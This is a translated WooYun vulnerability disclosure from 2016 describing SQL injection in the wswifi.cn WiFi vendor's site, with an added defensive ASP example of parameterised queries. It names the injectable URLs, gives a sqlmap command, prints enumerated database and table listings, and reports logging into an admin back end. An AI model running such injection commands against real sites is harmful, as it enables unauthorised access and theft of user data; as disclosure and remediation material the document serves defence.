
Vulnerability summary

Defect ID: wooyun-2016-0196946

Title: WiFi security: SQL injection in Weishang Wireless (微商无线) exposes 560,000 user records (control of 360 merchant devices, including internet cafes)

Vendor: wswifi.cn

Author: 黑色键盘丶

Submitted: 2016-04-22 14:05

Fix deadline: 2016-06-06 14:10

Published: 2016-06-06 14:10

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2016-04-22: Details sent to the vendor, awaiting vendor handling
2016-04-22: Vendor confirmed; details disclosed to the vendor only
2016-05-02: Details disclosed to core white hats and domain experts
2016-05-12: Details disclosed to regular white hats
2016-05-22: Details disclosed to intern white hats
2016-06-06: Details disclosed to the public

Brief description:

As titled. Cross-database queries are possible.

Detailed description:

Injection point: sqlmap.py -u "http://www.wswifi.cn/news_text.asp?newsid=3"
http://ws.wswifi.cn/news_text.asp?newsid=25


Database information

back-end DBMS: Microsoft SQL Server 2008
available databases [8]:
[*] Engineering_database
[*] master
[*] model
[*] msdb
[*] tempdb
[*] ws_weigou
[*] wswifi
[*] xhzA8_V10_2013


Table information

Database: wswifi
+------------------------------+---------+
| Table | Entries |
+------------------------------+---------+
| dbo.user_Browse_record | 261096 |
| dbo.free_renzheng | 211319 |
| dbo.setggao_Browse_record | 43750 |
| dbo.user_Browse_allcount | 28472 |
| dbo.china | 3295 |
| dbo.user_login | 2640 |
| dbo.Businesses_data | 1451 |
| dbo.column_type | 1416 |
| dbo.user_prozan | 1345 |
| dbo.user_singin | 1208 |
| dbo.Businesses_user | 1180 |
| dbo.product | 849 |
| dbo.[user_renzheng_count---] | 450 |
| dbo.setggao_allcount | 373 |
| dbo.businesses | 360 |
| dbo.product_query | 327 |
| dbo.propinglun | 299 |
| dbo.Merchants | 273 |
| dbo.Businessesuser_roll | 260 |
| dbo.setggao_click_record | 230 |
| dbo.pangolin_test_table | 192 |
| dbo.job_Browse_record | 190 |
| dbo.user_renzheng | 96 |
| dbo.kehu_fahuo | 87 |
| dbo.Businessesuser_active | 83 |
| dbo.kehu_info | 73 |
| dbo.user_renzheng_weixin | 47 |
| dbo.rizhi_info | 46 |
| dbo.agent_apply | 33 |
| dbo.index_news | 29 |
| dbo.Businesses_Transfer | 28 |
| dbo.agent | 27 |
| dbo.setggao_fabu | 20 |
| dbo.agent_salesman | 18 |
| dbo.industry | 11 |
| dbo.Identification_type | 10 |
| dbo.[setggao_order---] | 9 |
| dbo.setggao | 7 |
| dbo.index_help | 5 |
| dbo.column_display_mode | 4 |
| dbo.agent_jibie | 3 |
| dbo.agent_job | 3 |
| dbo.wswifiadmin | 3 |
| dbo.column_leixing | 2 |
| dbo.job_Apply | 2 |
| dbo.[ggao_send----] | 1 |
| dbo.[ggao_type--] | 1 |
| dbo.setggao_send | 1 |
+------------------------------+---------+


After dumping the wswifiadmin table, I logged into the backend: 360 merchants.

(screenshot: 56.png)


They are all internet cafes, KTVs and the like.
Cross-database query; this includes order information and the like.

Database: ws_weigou
+-------------------------------+---------+
| Table | Entries |
+-------------------------------+---------+
| dbo.user_order_awardnum | 407332 |
| dbo.user_browsepro_record | 269214 |
| dbo.user_liulan_record | 111459 |
| dbo.user_Integral_detailed | 4424 |
| dbo.user_login | 3807 |
| dbo.china | 3295 |
| dbo.user_order | 3074 |
| dbo.wg_user | 2421 |
| dbo.user_consumption_record | 542 |
| dbo.[user_browsepro_record--] | 523 |
| dbo.user_recharge_record | 507 |
| dbo.Product_shopping_trolley | 429 |
| dbo.user_red_envelopes | 357 |
| dbo.Product_award | 59 |
| dbo.category | 30 |
| dbo.product | 25 |
| dbo.uploadapp_pro | 24 |
| dbo.user_delivery_address | 18 |
| dbo.user_award_public | 15 |
| dbo.crowdfunding_pro | 14 |
| dbo.crowdfunding_order_record | 10 |
| dbo.crowdfunding_order | 8 |
| dbo.friend_pro | 7 |
| dbo.user_grade | 2 |
| dbo.crowdfunding_order_temp | 1 |
| dbo.uploadadd | 1 |
| dbo.user_order_temp | 1 |
| dbo.wsweigou_admin | 1 |
+-------------------------------+---------+


Database: Engineering_database
+----------------------------------+---------+
| Table | Entries |
+----------------------------------+---------+
| dbo.ggao_showcount_beifen | 25196092 |
| dbo.ggao_showcount | 3060837 |
| dbo.[ad_zhuomian_showcount--] | 1648957 |
| dbo.netbar_user_count | 561529 |
| dbo.ggao_clickcount | 486537 |
| dbo.ggao_allcount | 408032 |
| dbo.[ad_renzheng_lunbo_count--] | 328725 |
| dbo.rand_six_password | 200000 |
| dbo.netbar_user_allcount | 67232 |
| dbo.[netbar_zhuomian_allcount--] | 63633 |
| dbo.netbar_user_login | 47431 |
| dbo.netbar_user | 41135 |
| dbo.[ad_zhuomian_clickcount--] | 33934 |
| dbo.user_recharge | 8927 |
| dbo.netbar_login | 7432 |
| dbo.china | 3295 |
| dbo.ggao_fabu | 3008 |
| dbo.[netbar_lunbo_allcount--] | 1539 |
| dbo.product | 396 |
| dbo.Product_query | 312 |
| dbo.netbar | 281 |
| dbo.Package | 176 |
| dbo.ggao_send | 38 |
| dbo.netbar_admin | 29 |
| dbo.salesman | 21 |
| dbo.[ad_zhuomian--] | 17 |
| dbo.[Engineering_user--] | 9 |
| dbo.ggao_zizhu_allcount | 9 |
| dbo.netbar_user_renzheng | 8 |
| dbo.[ad_renzheng_lunbo--] | 3 |
| dbo.Engineering_admin | 3 |
| dbo.ggao_type | 3 |
| dbo.[ad_shezhi--] | 1 |
+----------------------------------+---------+


dbo.netbar_user_count | 561529
560,000 user records

(screenshot: 4567.png)

Proof of vulnerability:


Fix:

Filter input.
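As an added example (not wswifi.cn's code), a hypothetical news_text.asp handler in classic ASP/VBScript: the string-concatenation pattern that makes a numeric newsid injectable, beside a hardened version that whitelists the value and binds it as a typed parameter, which is what "filtering" needs to mean here. The connection string in Application("connStr"), the index_news column names and the function names are assumptions.

```vbscript
<%@ Language="VBScript" %>
<%
Option Explicit
' Added example, not wswifi.cn's code: a hypothetical news_text.asp handler.
' Assumed: connection string in Application("connStr"); table index_news with
' columns newsid, title, content (column names are assumptions).

' --- Vulnerable pattern: newsid is concatenated into the SQL text, so a
' value like  3 AND 1=1  is parsed by SQL Server as part of the query.
Function GetNewsUnsafe(conn, rawId)
    Set GetNewsUnsafe = conn.Execute( _
        "SELECT title, content FROM index_news WHERE newsid=" & rawId)
End Function

' --- Hardened pattern: whitelist the value as a short run of digits, then
' bind it as a typed integer parameter so it can never be parsed as SQL.
Function IsValidNewsId(rawId)
    Dim re
    Set re = New RegExp
    re.Pattern = "^\d{1,9}$"   ' digits only; rejects "3 AND 1=1", "-1", "1e3"
    IsValidNewsId = re.Test(rawId)
End Function

Function GetNewsSafe(conn, rawId)
    Dim cmd
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandText = "SELECT title, content FROM index_news WHERE newsid = ?"
    cmd.CommandType = 1   ' adCmdText
    ' adInteger = 3, adParamInput = 1: the value travels as an int, not as SQL.
    cmd.Parameters.Append cmd.CreateParameter("newsid", 3, 1, , CLng(rawId))
    Set GetNewsSafe = cmd.Execute
End Function

Dim conn, rs, rawId
rawId = Request.QueryString("newsid")
If Not IsValidNewsId(rawId) Then
    Response.Status = "400 Bad Request"
    Response.End
End If
Set conn = Server.CreateObject("ADODB.Connection")
conn.Open Application("connStr")
Set rs = GetNewsSafe(conn, rawId)
If Not rs.EOF Then
    Response.Write Server.HTMLEncode(rs("title"))
End If
rs.Close: conn.Close
%>
```

The same parameter binding applies to every other page that takes a query-string value into SQL; the whitelist alone is not a substitute, since fields that legitimately contain text cannot be restricted to digits.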

Copyright notice: when reposting, credit the source as 黑色键盘丶@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2016-04-22 14:08

Vendor reply:

High-risk vulnerability

Latest status:

None yet